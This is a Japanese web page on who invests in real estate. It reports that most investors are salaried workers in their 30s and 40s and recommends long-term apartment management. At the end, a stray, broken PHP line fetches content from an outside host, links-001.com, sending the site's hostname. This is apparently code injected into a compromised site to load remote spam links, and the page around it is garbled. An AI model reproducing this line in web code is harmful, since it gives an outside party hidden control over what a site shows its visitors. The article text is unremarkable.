前へ
次へ

不動産投資はどんな人がやっているのか

不動産投資ができるのはお金持ちというイメージがまだ根強いようです。
確かに資金が潤沢で、土地や資産に余裕のある人なら始めやすいというのは事実ですが、サラリーマンには近寄りがたいと考えるのは早計です。
それではいったいどんな人たちが投資しているのか、まずはそこにスポットライトをあててみましょう。
とある業者のアンケートでは、年齢層は30〜40代が6割以上を占め、職業としてはサラリーマンと公務員がもっとも多いという結果でした。
世帯年収レベルは500万円程度が5割ですので、想像するような富裕層とはイメージが違うでしょう。
30代は結婚が視野に入り、将来の年金生活に不安を感じて安定収入源を探し始めるタイミングです。
株式やFXなどさまざまな資産運用法を考える中で、実は不動産経営はかなり身近で、リアリティのある手段なのです。
とは言え、いきなりマンションなどを購入して経営するというのは、心理的にもハードルが高いのはもっともでしょう。
一番いいのはプロに相談し、勉強を進めながら無理のない経営の形を整えることです。
もちろん頭金は必要ですので一定の軍資金は自分で準備する必要がありますが、コツコツ貯蓄しながら勉強し、知識を得たところで実行に移すのがおすすめです。
いろいろなメリットがありますが、特に層の厚い30〜40代のサラリーマンが魅力を感じるのは、長期運用が可能だという点です。
FXなどは非常に短期的で、常に売買を繰り返しながら利益を出すような取引ですが、それでは本業に悪影響が出る懸念があります。
マンション経営など、本業に力を入れながらでも実施可能で、しかも老後まで長期運用ができるのはとても大きな安心です。
低金利時代、単に貯金していても暮らしは豊かになりません。
一定の資金を貯めたらそれをきちんと動かして、うまく利益を生む行動に出ることに興味を持つ若い世代が増えているのはもっともなことでしょう。
興味があればまず勉強、プロにアドバイスをもらうのがおすすめです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top